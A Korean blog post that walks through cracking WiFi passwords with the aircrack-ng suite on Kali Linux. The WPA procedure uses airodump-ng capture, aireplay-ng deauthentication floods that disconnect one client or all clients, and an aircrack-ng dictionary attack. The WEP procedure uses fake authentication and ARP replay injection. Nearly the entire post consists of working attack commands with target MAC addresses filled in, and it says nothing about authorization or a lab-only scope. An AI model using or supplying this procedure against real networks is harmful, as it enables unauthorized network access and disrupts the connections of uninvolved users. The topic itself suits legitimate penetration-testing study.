보안 도구 사용방법

무선 AP(WiFi) 침투

Security_Info 2023. 11. 7. 23:44

VMware 환경 및 칼리 리눅스에서 무선 AP 침투를 수행합니다.

침투 수행에 앞서 무선 USB 랜카드를 VMware에 연결 시킵니다. (USB 포트에 삽입하여 VMware로 연결)

무선 AP 침투 시 WPA 방식과 WEP 방식이 존재하며, 암호화 방식에 따라 사용되는 공격 절차가 상이합니다.

 

WPA Crack 절차
1. sudo airmon-ng check kill

(프로세스 간섭을 제거함)


2. sudo airmon-ng start wlan0

(인터페이스 설정 및 동작 시작함)


3. iwconfig

((monitor)모니터 모드로 변경 되었는지 확인 - 생략해도 무관함)


4. sudo airodump-ng wlan0

(무선 AP를 스캔함)


5. sudo airodump-ng wlan0 --channel 11 --bssid E6:23:D3:4D:95:76 -w savecap (savecap은 캡쳐 파일명)

(패스워드를 크랙할 타겟 AP를 지정함)
(C: 타겟 AP의 채널, BSSID: 타겟AP의 MAC주소, ESSID: 타겟 AP의 이름)

 

두 가지 방법으로 나뉨 단일 기기 연결을 끊을지 전체 기기 연결을 끊을지, 보통 무선 AP 침투 시 6-1번으로 진행함
6. sudo aireplay-ng --deauth 30 -a E6:23:D3:4D:95:76 -c 82:73:30:53:DB:4F wlan0

(단일 대상 연결 끊기)
( --deauth: 강제 연결 및 재인증 시도, -a: 타겟 AP MAC주소, -c: station MAC주소, station이란 무선 AP에 접속한 무선 기기를 의미함)


6-1. sudo aireplay-ng --deauth 30 -a E6:23:D3:4D:95:76 -h E6:23:D3:4D:95:76 wlan0

(-a 

(무선 AP에 연결된 모든 대상 연결 끊기)

( --deauth: 강제 연결 및 재인증 시도, -a: 타겟 AP MAC주소, -h: 타겟 AP MAC주소로 deauth를 시도하여 전체 기기 연결 해제 및 재인증 시도를 유도함)

deauth 동작을 과하게 유발 시 자동 재연결(재인증)이 동작되지 않아, 실제 장애를 유발할 수 있어
deauth 값을 30 이하로 하는게 안전해보임 > --deauth 30

 

7. sudo aircrack-ng savecap-01.cap -w /home/kali/Desktop/wpa_password.txt

(WPA 패스워드 크랙)
(savecap으로 저장했으나 savecap-01.cap으로 일부 추가되어 자동 저장됨, wpa_password.txt 파일은 사전 파일임)


8. sudo airmon-ng stop wlan0

(인터페이스 설정 및 동작 멈춤, 모니터 모드 비활성화)

 

채널 오류 발생 시
예시) wlan0 is on channel 10, but the AP uses channel 9
해답1) sudo iwconfig wlan0 channel 9 로 명령어 입력
해답2) 그냥 다시 6번 또는 6-1번 명령어 재실행

 



WEP Crack 절차

1. sudo airmon-ng check kill

(프로세스 간섭을 제거함)


2. sudo airmon-ng start wlan0

(인터페이스 설정 및 동작 시작함)


3. iwconfig

((monitor)모니터 모드로 변경 되었는지 확인 - 생략해도 무관함)


4. sudo airodump-ng wlan0

(무선 AP를 스캔함)

 

5. sudo airodump-ng wlan0 --channel 11 --bssid E6:23:D3:4D:95:76 -w savecap (savecap은 캡쳐 파일명)

(패스워드를 크랙할 타겟 AP를 지정함)
(수집할 IV는 데이터 패킷에 들어있으며 IV가 많아야 키 전채 내용 알 수있음

수집해야할 데이터 양은 100000개 이상 캡처되어야 failed가 안뜨는듯함)


6. aireplay-ng -1 5000 -a [ap의 mac주소] wlan0

(fake injection - 가짜 인증을 진행함)

(5000 > 5초에 1번씩 보냄)


7. aireplay-ng -3 -b  [ap의 mac주소] wlan0

(arp injection - arp reply 유발을 통해 패킷을 빠르게 수집함)

 

8. sudo aircrack-ng savecap-01.cap

(WEP 패스워드 크랙)

 

9. sudo airmon-ng stop wlan0

(인터페이스 설정 및 동작 멈춤, 모니터 모드 비활성화)